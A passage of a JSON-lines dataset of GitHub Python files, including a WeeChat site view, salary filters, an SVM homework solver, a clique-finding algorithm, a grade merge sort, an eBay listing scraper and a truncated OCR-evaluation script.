sender,\n settings.SCRIPTS_MAILTO)\n email.attach(script.name_with_extension(),\n get_script_content(scriptfile),\n 'text/plain')\n email.send()\n except: # noqa: E722 pylint: disable=bare-except\n return HttpResponseRedirect('/scripts/updateerror/')\n\n return HttpResponseRedirect('/scripts/updateok/')\n else:\n form = ScriptFormUpdate()\n return render(\n request,\n 'scripts/update.html',\n {\n 'form': form,\n },\n )\n\n\ndef pending(request):\n \"\"\"Page with scripts pending for approval.\"\"\"\n script_list = Script.objects.filter(approved=False).order_by('-added')\n return render(\n request,\n 'scripts/pending.html',\n {\n 'script_list': script_list,\n },\n )\n\n\ndef python3(request):\n \"\"\"Page with Python 3 transition.\"\"\"\n v037_date = Release.objects.get(version='0.3.7').date\n v037_date = datetime(\n year=v037_date.year,\n month=v037_date.month,\n day=v037_date.day,\n )\n status_list = []\n # status when the transition started\n status_list.append({\n 'date': datetime(2018, 6, 3),\n 'scripts': 347,\n 'python_scripts': 216,\n 'scripts_ok': 43,\n 'scripts_remaining': 173,\n })\n # status on 2019-07-01 (WeeChat is built with Python 3 by default)\n status_list.append({\n 'date': datetime(2019, 7, 1),\n 'scripts': 362,\n 'python_scripts': 226,\n 'scripts_ok': 96,\n 'scripts_remaining': 130,\n })\n # status on 2020-01-01 (initial end of transition)\n status_list.append({\n 'date': datetime(2020, 1, 1),\n 'scripts': 364,\n 'python_scripts': 228,\n 'scripts_ok': 125,\n 'scripts_remaining': 103,\n })\n # status on 2020-05-01 (end of transition)\n status_list.append({\n 'date': datetime(2020, 5, 1),\n 'scripts': 364,\n 'python_scripts': 228,\n 'scripts_ok': 129,\n 'scripts_remaining': 99,\n })\n # status today\n scripts_list = Script.objects.filter(approved=True).count()\n python_scripts = (Script.objects.filter(approved=True)\n .filter(language='python')\n .count())\n scripts_ok = (Script.objects.filter(approved=True)\n .filter(language='python')\n .filter(tags__regex=r'(^|,)py3($|,)')\n .count())\n scripts_remaining = python_scripts - scripts_ok\n status_list.append({\n 'date': datetime.now(),\n 'today': True,\n 'scripts': scripts_list,\n 'python_scripts': python_scripts,\n 'scripts_ok': scripts_ok,\n 'scripts_remaining': scripts_remaining,\n })\n # compute percentages and flag \"future\"\n now = datetime.now()\n for status in status_list:\n status['python_scripts_percent'] = (\n (status['python_scripts'] * 100) // status['scripts']\n )\n status['scripts_ok_percent'] = (\n (status['scripts_ok'] * 100) // status['python_scripts']\n )\n status['scripts_remaining_percent'] = (\n 100 - status['scripts_ok_percent']\n )\n status['future'] = status['date'] > now\n return render(\n request,\n 'scripts/python3.html',\n {\n 'python3_date': datetime(2008, 12, 3),\n 'v037_date': v037_date,\n 'roadmap_start': datetime(2018, 6, 3),\n 'roadmap_email': datetime(2018, 6, 16),\n 'roadmap_new_py3': datetime(2018, 7, 1),\n 'roadmap_all_py3': datetime(2018, 9, 1),\n 'roadmap_weechat_py3': datetime(2019, 7, 1),\n 'roadmap_initial_end': datetime(2020, 1, 1),\n 'roadmap_end': datetime(2020, 5, 1),\n 'status_list': status_list,\n },\n )\n","repo_name":"84KaliPleXon3/weechat.org","sub_path":"weechat/scripts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6877576092","text":"from typing import Union, List, Dict\nfrom src.insights.jobs import read\n\n\ndef get_max_salary(path: str) -> int:\n path_reader_data = read(path)\n return max(\n [\n int(data_salary[\"max_salary\"])\n for data_salary in path_reader_data\n if data_salary[\"max_salary\"].isdigit()\n ]\n )\n\n\ndef get_min_salary(path: str) -> int:\n path_reader_data = read(path)\n return min(\n [\n int(data_salary[\"min_salary\"])\n for data_salary in path_reader_data\n if data_salary[\"min_salary\"].isdigit()\n ]\n )\n\n\ndef matches_salary_range(job: Dict, salary: Union[int, str]) -> bool:\n try:\n min_salary = int(job.get(\"min_salary\"))\n max_salary = int(job.get(\"max_salary\"))\n salary = int(salary)\n if min_salary > max_salary:\n raise ValueError\n except (TypeError, KeyError):\n raise ValueError\n return min_salary <= salary <= max_salary\n\n\ndef filter_by_salary_range(\n jobs: List[dict], salary: Union[str, int]\n) -> List[Dict]:\n filtered_jobs = []\n\n for job in jobs:\n try:\n if matches_salary_range(job, salary):\n filtered_jobs.append(job)\n except (TypeError, ValueError): # captura a exceção e continua\n pass\n\n return filtered_jobs\n\n\n# me parece que de alguma forma esta verificação acima está errada e aceita\n# valor que não deveria no filter\n","repo_name":"CamilaPaiz/project-insights","sub_path":"src/insights/salaries.py","file_name":"salaries.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39387331815","text":"#################\r\n#Name - Sayem Lincoln\r\n#PID - A54207835\r\n#Homework 8 Problem 5\r\n#################\r\n\r\nimport time\r\nimport random\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn import preprocessing\r\n\r\nfrom scipy.io import loadmat\r\n\r\n# Reading the data from the two mat files called \"data.mat\" and \"USPS.mat\"\r\n\r\ndata = loadmat('data.mat')\r\nusps = loadmat('USPS.mat')\r\n\r\n#################\r\n# PART I : (A)\r\n#################\r\n\r\n## First Data Set \"data.mat\"\r\n\r\nX = pd.DataFrame(data['X'])\r\nX.shape\r\n\r\nX.head()\r\n\r\ny = pd.DataFrame(data['Y'])\r\ny.shape\r\n\r\ny[0].unique()\r\n\r\n# CVXOPT solver and resulting α\r\n\r\nfrom cvxopt import matrix as cvxopt_matrix\r\nfrom cvxopt import solvers as cvxopt_solvers\r\n\r\n#Initializing values and computing H. Note the 1. to force to float type\r\nm,n = X.shape\r\ny = y.values.reshape(-1,1) * 1.\r\nX_dash = y * X\r\nH = np.dot(X_dash , X_dash.T) * 1.\r\n\r\n#Converting into cvxopt format\r\nP = cvxopt_matrix(H)\r\nq = cvxopt_matrix(-np.ones((m, 1)))\r\nG = cvxopt_matrix(-np.eye(m))\r\nh = cvxopt_matrix(np.zeros(m))\r\nA = cvxopt_matrix(y.reshape(1, -1))\r\nb = cvxopt_matrix(np.zeros(1))\r\n\r\n#Run solver\r\nsol = cvxopt_solvers.qp(P, q, G, h, A, b)\r\nalphas = np.array(sol['x'])\r\n\r\n\r\n# Compute w and b parameters\r\n\r\n#w parameter in vectorized form\r\nw = ((y * alphas).T @ X.values).reshape(-1,1)\r\n\r\n#Selecting the set of indices S corresponding to non zero parameters\r\nS = (alphas > 1e-4).flatten()\r\n\r\n#Computing b\r\nb = y[S] - np.dot(X[S], w)\r\n\r\n#Display results\r\n#print('Alphas = ',alphas[alphas > 1e-4])\r\nprint('w = ', w.flatten(), '\\n')\r\nprint('b = ', b[0])\r\n\r\n## Second Data Set \"USPS.mat\"\r\n\r\n# We will do the same thing, extract the data and then calculate CVXOPT solver for this data set.\r\n\r\nX = pd.DataFrame(usps['A'])\r\nX.shape\r\n\r\nX.head()\r\n\r\ny = pd.DataFrame(usps['L'])\r\ny.shape\r\n\r\ny[0].unique()\r\n\r\n# In this case, we have a multiclass problem not like the previous one (Binary classification)\r\n\r\n# CVXOPT solver and resulting α\r\n\r\n#Initializing values and computing H. Note the 1. to force to float type\r\nm,n = X.shape\r\ny = y.values.reshape(-1,1) * 1.\r\nX_dash = y * X\r\nX_dash = preprocessing.scale(X_dash)\r\nH = np.dot(X_dash , X_dash.T) * 1.\r\n\r\n\r\n#Converting into cvxopt format\r\nP = cvxopt_matrix(H)\r\nq = cvxopt_matrix(-np.ones((m, 1)))\r\nG = cvxopt_matrix(-np.eye(m))\r\nh = cvxopt_matrix(np.zeros(m))\r\nA = cvxopt_matrix(y.reshape(1, -1))\r\nb = cvxopt_matrix(np.zeros(1))\r\n\r\n#Run solver\r\nsol = cvxopt_solvers.qp(P, q, G, h, A, b)\r\nalphas = np.array(sol['x'])\r\n\r\n# Compute w and b parameters\r\n\r\n#w parameter in vectorized form\r\nw = ((y * alphas).T @ X.values).reshape(-1,1)\r\n\r\n#Selecting the set of indices S corresponding to non zero parameters\r\nS = (alphas > 1e-4).flatten()\r\n\r\n#Computing b\r\nb = y[S] - np.dot(X[S], w)\r\n\r\n#Display results\r\n#print('Alphas = ',alphas[alphas > 1e-4])\r\nprint('w = ', w.flatten(), '\\n')\r\nprint('b = ', b)\r\n\r\n##################\r\n# PART II : (B)\r\n##################\r\n\r\n\r\n\r\n# Now we investigate the second part of the question : Using random datasets (X, y) as input to the algorithm and vary the sample size and feature dimensionality.\r\n\r\ndef solve_random_qp(m, n):\r\n X, y = np.random.random((m, n)), random.sample(([1]*m+[-1]*m), m)\r\n y = np.array(y).reshape(-1,1) * 1.\r\n X_dash = y * X\r\n H = np.dot(X_dash , X_dash.T) * 1.\r\n \r\n #Converting into cvxopt format\r\n P = cvxopt_matrix(H)\r\n q = cvxopt_matrix(-np.ones((m, 1)))\r\n G = cvxopt_matrix(-np.eye(m))\r\n h = cvxopt_matrix(np.zeros(m))\r\n A = cvxopt_matrix(y.reshape(1, -1))\r\n b = cvxopt_matrix(np.zeros(1))\r\n cvxopt_solvers.options['show_progress'] = False\r\n \r\n start = time.time()\r\n cvxopt_solvers.qp(P, q, G, h, A, b)\r\n \r\n return (time.time() - start)\r\n\r\n## Varying the Sample size:\r\n\r\nm_sizes = [50, 100, 200, 500, 1000, 2000, 3000, 4000]\r\n\r\nm_times = []\r\nfor size in m_sizes:\r\n print(\"Running on sample size %d...\" % size)\r\n m_times.append(solve_random_qp(size, 5))\r\n\r\nplt.plot(m_sizes, m_times, lw=2, marker='o')\r\nplt.grid(True)\r\nplt.xscale('log')\r\nplt.ylabel('Time (s)');\r\nplt.xlabel('Sample size m');\r\nplt.title('Time costs of the sample sizes');\r\n\r\n## Varying the Feature size:\r\n\r\nn_sizes = [5, 10, 20, 50, 100, 300, 500]\r\n\r\nn_times = []\r\nfor size in n_sizes:\r\n print(\"Running on feature size %d...\" % size)\r\n n_times.append(solve_random_qp(1000, size))\r\n\r\n\r\nplt.plot(n_sizes, n_times, lw=2, marker='o')\r\nplt.grid(True)\r\nplt.xscale('log')\r\nplt.ylabel('Time (s)');\r\nplt.xlabel('Feature size n');\r\nplt.title('Time costs of the feature sizes');\r\n\r\n\r\n# We can remark that varying number of samples is more time consuming than varying the number of features for this solver.\r\n","repo_name":"SayemLincoln/ML-course","sub_path":"HW 8/Problem 5 code.py","file_name":"Problem 5 code.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18810846492","text":"# from datetime import datetime\n\nWTQ = 'Wallet To Quicksave'\nQTW = 'Quicksave To Wallet'\nBTQ = 'Bank Account To Quicksave'\nQTB = 'Quicksave To Bank Account'\n\nQUICKSAVE_TRANSACTION_TYPES = [\n (WTQ, WTQ),\n (QTW, QTW),\n (BTQ, BTQ),\n (QTB, QTB)\n]\n\nWTT = 'Wallet To Targetsave'\nTTW = 'Targetsave To Wallet'\nBTT = 'Bank Account To Targetsave'\nTTB = 'Targetsave To Bank Account'\n\nTARGET_SAVE_TRANSACTION_TYPES = [\n (WTT, WTT),\n (TTW, TTW),\n (BTT, BTT),\n (TTB, TTB)\n]\n\nD = 'daily'\nW = 'weekly'\nM = 'monthly'\n\nJOINT_SAVING_FREQUENCY_TYPES = [\n (D, D),\n (W, W),\n (M, M)\n]\n\nWTJ = 'Wallet To Joint Save'\nJTW = 'Joint Save To Wallet'\n\nJOINT_SAVE_TRANSACTION_TYPES = [\n (WTJ, WTJ),\n (JTW, JTW)\n]\n\ndef check_week(date2, date1):\n date_difference = date2 - date1\n days = date_difference.days\n if days != 0:\n if days % 7 == 0:\n return days // 7\n else:\n return (days // 7) + 1\n return 1\n\ndef check_end_of_week(date2, date1):\n date_difference = date2 - date1\n days = date_difference.days\n if days != 1:\n return (days - 1) % 7 == 0\n return False\n\ndef check_end_of_month(date2, date1):\n date_difference = date2 - date1\n days = date_difference.days\n if days != 0:\n return days % 30 == 0\n return False\n\n \n# def check_days(date1, date2):\n# date_difference = date2 - date1\n# return date_difference.days\n\n\n# def check_date(date):\n# now = datetime.date(datetime.now())\n# date_difference = now - date\n# days = date_difference.days % 28\n# month = date_difference.days // 28\n# week = (month * 4) + (days // 8) + 1\n# return {'days': days, 'month': month, 'weekday': date.weekday(), 'week': week}\n","repo_name":"rajman01/investfy","sub_path":"savings/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27231243268","text":"from datetime import datetime, timedelta\nfrom time import sleep\nfrom random import choice\nfrom collections.abc import Iterator\nfrom collections.abc import Callable\nfrom dto.conjure_time_dto import LogConjureTimeDto\n\n\ndef get_seconds(config: dict[str, str]) -> Callable[[datetime], Callable]:\n \"\"\"\n Gets the difference in seconds by subtracting two time windows (data and time).\n Calculates the difference between (date time of elapsed time) and (date time given).\n\n :(path_file: str)\n\n :(start_datetime: datetime)\n\n :(list_seconds: list[int], total_epochs: int)\n\n :return \n init(start_datetime: datetime) - Initialize variables and need settings\n check_seconds(list_seconds: list[int], total_epochs: int) - Runs the check between dates\n \"\"\"\n def init(start_datetime: datetime) -> Callable[[list[int], int], None]:\n\n def get_seconds(end_cut: datetime, start_cut: datetime) -> int:\n return (end_cut - start_cut).seconds\n\n def finite_time_mock(seconds: list[int], total_epochs: int) -> Iterator[int]:\n\n for epoch in range(total_epochs):\n\n sleep(choice(seconds))\n\n yield epoch\n\n def log_time(log: LogConjureTimeDto) -> None:\n\n with open(config[\"path_file_log\"], 'a') as f:\n f.write(f\"{'epoch':8}:{log.epoch}\\n\")\n f.write(f\"{'seconds':8}:{log.seconds}\\n\")\n f.write(f\"{'start_cut':8}:{log.start_cut}\\n\")\n f.write(f\"{'end_cut':8}:{log.end_cut}\\n\")\n f.write(\"------------------------\\n\")\n\n def check_seconds(list_seconds: list[int], total_epochs: int) -> None:\n\n start_cut: datetime = start_datetime\n\n current_time: datetime | None = None\n seconds: int = 0\n\n for epoch in finite_time_mock(list_seconds, total_epochs):\n\n current_time = datetime.now()\n\n seconds = get_seconds(current_time, start_cut)\n\n start_cut = current_time - \\\n timedelta(seconds=seconds)\n\n log_time(LogConjureTimeDto(\n epoch, seconds, start_cut, current_time))\n\n start_cut = current_time\n\n return check_seconds\n\n return init\n","repo_name":"rodrigmars/conjure-times","sub_path":"conjure_times/core/calculate_time_core.py","file_name":"calculate_time_core.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30132776727","text":"\"\"\"\r\nfichier contenant les algos principaux \r\n\r\nauthor : gouth\r\n\r\n\"\"\"\r\n#return les noeuds communs entre l'ensemble P et U\r\n#P et U sont des ensembles\r\n#O(nlog(n)) pour le tri puis simple parcours O(n)\r\ndef inter(P,U):\r\n\tp = list(P) #set to list for sorting\r\n\tu = list(U)\r\n\tp = sorted(p)\r\n\tu = sorted(u)\r\n\r\n\ti = 0\r\n\tj = 0\r\n\r\n\tres = set()\r\n\t\r\n\t#print (\"limite de P : \", len(P))\r\n\t#print (\"limite de U : \", len(U))\r\n\r\n\twhile(i<len(p) and j<len(u)): #fin du parcours d'un des deux tableaux\r\n\t\t#print (\"i:\", i)\r\n\t\t#print (\"j;\", j)\r\n\r\n\t\tif (p[i] < u[j]):\r\n\t\t\ti+=1\r\n\t\telif (p[i] > u[j]):\r\n\t\t\tj+=1\r\n\t\telse:\r\n\t\t\tres.add(p[i])\r\n\t\t\ti+=1\r\n\t\t\tj+=1\r\n\r\n\treturn res\r\n\t\r\n#renvoie le noeud pivot candidat pour BronKerbosch\r\n#u \\ argmax card|P inter voisin(u)|\r\n#return \t-1 si pas de pivot mais devrait jamais arriver\r\n#\t\t\tid du noeud sinon\r\n#P et X object : ensemble\r\n#O(n^2log(n)) a verif\r\ndef pivot(P, X, graph):\r\n\r\n noeuds = P.union(X)\r\n assert(len(P) + len(X) >= len(noeuds))\r\n \"\"\"\r\n print (\"DEBUG :\")\r\n print_set(P, noeuds, X)\r\n \"\"\"\r\n maxi = -1 \r\n i = 0\r\n res = -1\r\n \r\n for node in noeuds: #P U X \r\n voisins = graph.get_voisins(node) #set\r\n intersect = inter(P, voisins)\r\n tmp = len(intersect)\r\n if(tmp > maxi):\r\n maxi = tmp\r\n res = node\r\n i+=1\r\n\r\n return res\r\n\r\n\r\ndef print_set(P,R,X):\r\n\tprint (\"============track============\\n\")\r\n\tprint (\"P:\", P,\"\\tR:\", R, \"\\tX:\", X)\r\n\tprint (\"-----------------------------\\n\")\r\n\r\n#algo de recherche de clique maximale\r\n# \r\ndef BronKerbosch(P, R, X, G, depth):\r\n\tprint(\"\\n\\nlevel :\", depth,\"\\n\")\r\n\t#print_set(P,R,X)\r\n\tif (len(P)== 0 and len(X)==0): #ens. vide\r\n\t\tprint (\"\\t\\t\\tClique found : \")\r\n\t\tprint_set({}, R, {})\r\n\t\treturn R #clique maximale\r\n\t\r\n\tu = pivot(P,X,G)\t#noeud pivot Tomita et al\r\n\tens_u = set()\t\t#set(u) in order to perform union later\t \r\n\tens_u.add(u)\r\n\tassert(len(ens_u)==1)\r\n\tvoisins = G.get_voisins(u)\r\n\tp = P.difference(voisins) \r\n\t\r\n\tassert(len(p) <= len(P))\r\n\t\r\n\tprint_set(P,R,X)\r\n\t\"\"\"\r\n\tprint (\"pivot u : \", u)\r\n\tprint (\"will itereting over \", p)\r\n\t\"\"\"\r\n\tfor node in p:\r\n\t\t#print (\"looking node :\", node, \"at level \" , depth)\t\r\n\t\tp_tmp = inter(P, voisins)\r\n\t\tR.union(ens_u) \r\n\t\t#print (\"prev X :\", X , \" inter \", voisins ,)\r\n\t\tx_tmp = inter(X, voisins)\r\n\t\t#print (\"next X : \", x_tmp)\r\n\t\tBronKerbosch(p_tmp, R, x_tmp, G, depth+1)\r\n\t\r\n\t\tP.discard(u)\r\n\t\tprev_len = len(X)\r\n\t\t#print (\"prev X\", X, \"union \", u,)\r\n\t\tX.add(u)\r\n\t\t#print (\"next X\", X) \r\n\t\tassert(len(X) == prev_len+1 or len(X) == prev_len)\r\n\r\n\r\n\r\n\r\n\t\r\n\t\r\n","repo_name":"314wind/RECHERCHE","sub_path":"algo.py","file_name":"algo.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17350574613","text":"import pickle\nimport os.path\n\n\ndef lerarquivo():\n with open(\"entrada.bin\", \"rb\") as f:\n alunos = pickle.load(f)\n notas = pickle.load(f)\n f.close()\n return alunos, notas\n\n\ndef existeArquivo():\n if (os.path.isfile('entrada.bin')):\n return True\n else:\n print(\"O arquivo não existe\")\n return False\n\n\n# Função que realiza a soma dos itens das tuplas e retorna eles\ndef maiorSoma(esquerda, direita):\n somaEsquerda = 0\n somaDireita = 0\n for i in esquerda[1:5]:\n somaEsquerda = i + somaEsquerda\n for j in direita[1:5]:\n somaDireita = j + somaDireita\n return somaEsquerda, somaDireita\n\n\n# Função que filtra os parametros de ordenação\ndef anterior(esquerda, direta, alunos):\n somaEsquerda, somaDireita = maiorSoma(esquerda, direta)\n\n # Avalia a soma da nota total\n if somaEsquerda > somaDireita:\n return True\n if somaEsquerda < somaDireita:\n return False\n\n # Caso a soma seja igual ele avalia a segunda nota\n if somaEsquerda == somaDireita:\n if esquerda[2] > direta[2]:\n return True\n if esquerda[2] < direta[2]:\n return False\n\n # Avalia o menor tempo de execução\n if esquerda[5] < direta[5]:\n return True\n if esquerda[5] > direta[5]:\n return False\n\n # Avalia a ordem alfabética\n if alunos[esquerda[0]] < alunos[direta[0]]:\n return True\n if alunos[esquerda[0]] > alunos[direta[0]]:\n return False\n\n\ndef merge(l, esquerda, direita, alunos):\n i, j, k = 0, 0, 0\n\n while i < len(esquerda) and j < len(direita):\n if anterior(esquerda[i], direita[j], alunos):\n l[k] = esquerda[i]\n i = i + 1\n else:\n l[k] = direita[j]\n j = j + 1\n k = k + 1\n\n while i < len(esquerda):\n l[k] = esquerda[i]\n i = i + 1\n k = k + 1\n\n while j < len(direita):\n l[k] = direita[j]\n j = j + 1\n k = k + 1\n\n\ndef mergeSort(l, alunos):\n if len(l) > 1:\n meio = len(l) // 2\n esquerda = l[:meio]\n direita = l[meio:]\n mergeSort(esquerda, alunos)\n mergeSort(direita, alunos)\n merge(l, esquerda, direita, alunos)\n\n return l\n\n# Função que avalia se o aluno recebe os dois pontos extras e mostra as notas.\ndef avalia2pts(l, alunos):\n cont = 0\n nota2 = l[4][2]\n tempo = l[4][5]\n for i in l:\n chave = i[0]\n soma = sum(i[1:5])\n if cont <= 5:\n soma = soma + 2\n cont = cont + 1\n if cont > 6:\n if i[2] == nota2 and i[5] == tempo:\n soma = soma + 2\n\n print(f\"{alunos[chave]} {soma}\")\n","repo_name":"matheustxaguiar/Programming-Period-2","sub_path":"Coursework Final/modulo.py","file_name":"modulo.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33246847157","text":"def flip_bit(n: int) -> int:\n \"\"\"\n Calculates number of consecutive 1s if user is able to flip 1 bit to 1.\n \"\"\"\n prev_len = curr_len = max_len = 0\n while (n):\n if n & 1:\n curr_len += 1\n else:\n prev_len = curr_len if n & 2 else 0\n curr_len = 0\n max_len = max(prev_len + curr_len + 1, max_len)\n n >>= 1\n return max_len\n\n\nif __name__ == \"main\":\n print(flip_bit(0b11011101111)) # 8\n print(flip_bit(0b11111101111)) # 11\n print(flip_bit(0b10101010101)) # 3\n","repo_name":"Onteri/ctci_6th_edition","sub_path":"chapter_5_bit_manipulation/python/5.3-flip_bit_to_win.py","file_name":"5.3-flip_bit_to_win.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4506532082","text":"from bs4 import BeautifulSoup\nfrom PIL import Image\nfrom urllib import request\nimport requests\nfrom csv import *\nurl= 'https://www.ebay.com/sch/i.html?_from=R40&_trksid=p2047675.m570.l1311&_nkw=crocs+classic+clog+lightning+mcqueen&_sacat=0'\npage = requests.get(url)\n\nsoup = BeautifulSoup(page.content, 'html.parser')\nlists = soup.find_all('div', class_ = 's-item__wrapper clearfix')\n# imagelists = soup.find_all('div', class_ = 's-item__image-wrapper image-treatment')\nwith open('shoes.csv', 'w', encoding='utf8', newline= '') as f:\n pen = writer(f)\n header = ['Price', 'Shipping', 'Photo']\n pen.writerow(header)\n count=1\n for list in lists: \n exception = list.find('span', class_ = 'BOLD BOLD')\n try:\n if list.find('span', class_ = 'BOLD BOLD').text.replace('\\n', '') == 'Authenticity Guarantee':\n count +=1\n try:\n price = list.find('span', class_ = 's-item__price').text.replace('\\n', '')\n print(price)\n except:\n price = None\n try:\n shipping = list.find('span', class_ = 's-item__shipping s-item__logisticsCost').text.replace('\\n', '')\n print(shipping)\n except:\n shipping = None\n if shipping == None:\n shipping = 'Free shipping'\n\n link = list.find('img', class_='s-item__image-img')\n img_url = link['src']\n img_name = 'Crocs' + str(count) + '.jpg'\n print(img_name)\n request.urlretrieve(img_url, img_name)\n #get(img_url).content\n \n picture = Image.open(img_name)\n info = [str(price), str(shipping), str(img_name)]\n pen.writerow(info)\n except:\n exception == None\n # for img in imagelists:\n # link = imagelists.find('img', class_='s-item__image-img')\n # print(img['src'])","repo_name":"RedMonk3y/Project-2","sub_path":"Ebay_Scraper.py","file_name":"Ebay_Scraper.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37580813832","text":"#!/usr/bin/env python\n\nimport difflib\nimport io\nimport json\nimport logging\nimport pathlib\nimport sys\nimport tempfile\nfrom copy import deepcopy\n\nimport click\nimport cwltool.factory\nimport cwltool.loghandler\nimport numpy as np\nimport pandas as pd\nimport untangle\nfrom shapely.geometry import MultiPolygon, Polygon, box\n\nJACCARD_SCORE_THRESHOLD = 0.9\nPIXEL_MATCH_THRESHOLD = 10\n\n# Do not log so much with cwltool\ncwltool.loghandler._logger.setLevel(logging.WARN)\n\n\ndef process_single(gt_file, in_file):\n print(\"processing ${gt_file} and ${in_file}\".format(gt_file=gt_file, in_file=in_file))\n overall_report = {}\n # writeableOutputFile = open(outputfile,\"w+\")\n gtXML = untangle.parse(gt_file) # open(ground_truth_file,\"r\")\n inXML = untangle.parse(in_file) # open(input_file,\"r\")\n\n if (hasattr(gtXML, \"PcGts\") and hasattr(inXML, \"PcGts\")\n and hasattr(gtXML.PcGts, \"Page\") and hasattr(inXML.PcGts, \"Page\")):\n\n matches_for_text_processing, boundingboxes_report = processBoundingboxes(\n gtXML, inXML)\n overall_report['boundingboxes'] = boundingboxes_report\n\n readingorder_report = processReadingorder(gtXML, inXML,\n matches_for_text_processing)\n overall_report['readingorder'] = readingorder_report\n\n textregion_report = processTextregions(gtXML, inXML,\n matches_for_text_processing)\n overall_report['textregions'] = textregion_report\n else:\n overall_report = {\n 'boundingboxes': {\n 'mean': np.nan,\n 'mean_merged': np.nan,\n 'nr_false_positives': np.nan,\n 'nr_false_negatives': np.nan\n },\n 'readingorder': \"\",\n 'textregions': {\n 'CER': np.nan,\n 'WER': np.nan,\n 'WER (order independent)': np.nan\n },\n }\n\n print(overall_report)\n\n return overall_report\n\n\n@click.command()\n@click.argument('gt_file', type=click.File(encoding='utf-8'))\n@click.argument('in_file', type=click.File(encoding='utf-8'))\ndef processfile(gt_file, in_file):\n report = process_single(gt_file, in_file)\n print(json.dumps(report, indent=4, sort_keys=True))\n\n\ndef processReadingorder(gtXML, inXML, matches_for_text_processing):\n report = {}\n\n if (hasattr(gtXML.PcGts.Page, 'ReadingOrder')\n and hasattr(inXML.PcGts.Page, 'ReadingOrder')\n and hasattr(gtXML.PcGts.Page.ReadingOrder, 'OrderedGroup')\n and hasattr(inXML.PcGts.Page.ReadingOrder, 'OrderedGroup')):\n # Sort Reading orders by index\n gtOrderedGroup = sorted(\n gtXML.PcGts.Page.ReadingOrder.OrderedGroup.RegionRefIndexed,\n key=lambda RegionRefIndexed: RegionRefIndexed['index'])\n inOrderedGroup = sorted(\n inXML.PcGts.Page.ReadingOrder.OrderedGroup.RegionRefIndexed,\n key=lambda RegionRefIndexed: RegionRefIndexed['index'])\n\n # Read the reading order of the Ground truth file.\n gtReadingOrder = []\n for i in range(len(gtOrderedGroup)):\n gtReadingOrder.append(gtOrderedGroup[i]['regionRef'])\n\n # Translate to the names given in the input file with help of the matched bounding boxes.\n inTranslatedReadingOrder = []\n for match in gtReadingOrder:\n if (match in matches_for_text_processing):\n inTranslatedReadingOrder.append(\n matches_for_text_processing[match])\n\n # Read the reading order of the input file.\n inReadingOrder = []\n for i in range(len(inOrderedGroup)):\n inReadingOrder.append(inOrderedGroup[i]['regionRef'])\n\n # Compare using difflib\n a = inTranslatedReadingOrder\n b = inReadingOrder\n\n s = difflib.SequenceMatcher(None, a, b)\n for tag, i1, i2, j1, j2 in s.get_opcodes():\n report = (\"%7s a[%d:%d] (%s) b[%d:%d] (%s)\" %\n (tag, i1, i2, a[i1:i2], j1, j2, b[j1:j2]))\n else:\n report = \"\"\n\n return report\n\n\ndef callCWL(gt_filename, input_filename):\n fac = cwltool.factory.Factory()\n ocrevaluation_performance = fac.make(\n \"ocrbenchmark/evaluation/ocrevaluation/ocrevaluation-performance.cwl\")\n input = {\n 'gt': {\n \"class\": \"File\",\n \"location\": pathlib.Path(gt_filename).as_uri()\n },\n 'ocr': {\n \"class\": \"File\",\n \"location\": pathlib.Path(input_filename).as_uri()\n }\n }\n return ocrevaluation_performance(**input)\n\n\ndef processTextregions(gtXML, inXML, matches_for_text_processing):\n frames = []\n report = {}\n\n gtRegions = getTextregions(gtXML.PcGts.Page)\n inRegions = getTextregions(inXML.PcGts.Page)\n\n # For all Ground truth text regions\n for gt_region in gtRegions:\n gt_region_id = gt_region[0]\n gt_region_text = gt_region[1].TextEquiv.Unicode.cdata\n\n # Translate the id to the input file's TextRegion id using the boundingbox data\n if (gt_region_id in matches_for_text_processing):\n inTranslatedRegionName = matches_for_text_processing[gt_region_id]\n\n # Extract the matching input file Textregion\n # Write tmp files\n gt_file = tempfile.NamedTemporaryFile(suffix='.txt')\n gt_file.write(gt_region_text.encode('utf-8'))\n\n # Writes normal and combined regions to file\n in_file = tempfile.NamedTemporaryFile(suffix='.txt')\n for in_region in inRegions:\n if (in_region[0] in inTranslatedRegionName):\n in_region_text = in_region[1].TextEquiv.Unicode.cdata\n\n in_file.write(in_region_text.encode('utf-8'))\n\n gt_file.flush()\n in_file.flush()\n\n # call OCREvaluation through CWL workflow and write input to frames\n result = callCWL(gt_file.name, in_file.name)\n data = result['global_data']['contents']\n reader = io.StringIO(data)\n\n # Extract result from csv file\n df = pd.read_csv(reader, sep=';')\n df['region_id'] = inTranslatedRegionName\n\n # Manipulate the result into a nice frame\n df = df.set_index('region_id')\n df = df.drop('doc_id', axis=1)\n\n frames.append(df)\n\n gt_file.close()\n in_file.close()\n\n if len(frames) > 0:\n df = pd.concat(frames)\n mean = df.mean(axis=0)\n report = df.transpose().to_dict()\n report['mean'] = mean.to_dict()\n else:\n report = {\n 'mean': {\n 'CER': np.nan,\n 'WER': np.nan,\n 'WER (order independent)': np.nan\n }\n }\n\n return report\n\n\ndef processBoundingboxes(gtXML, inXML):\n report = {}\n matches_for_text_processing = {}\n\n gtPolygons = getPolygons(gtXML.PcGts.Page)\n inPolygons = getPolygons(inXML.PcGts.Page)\n\n 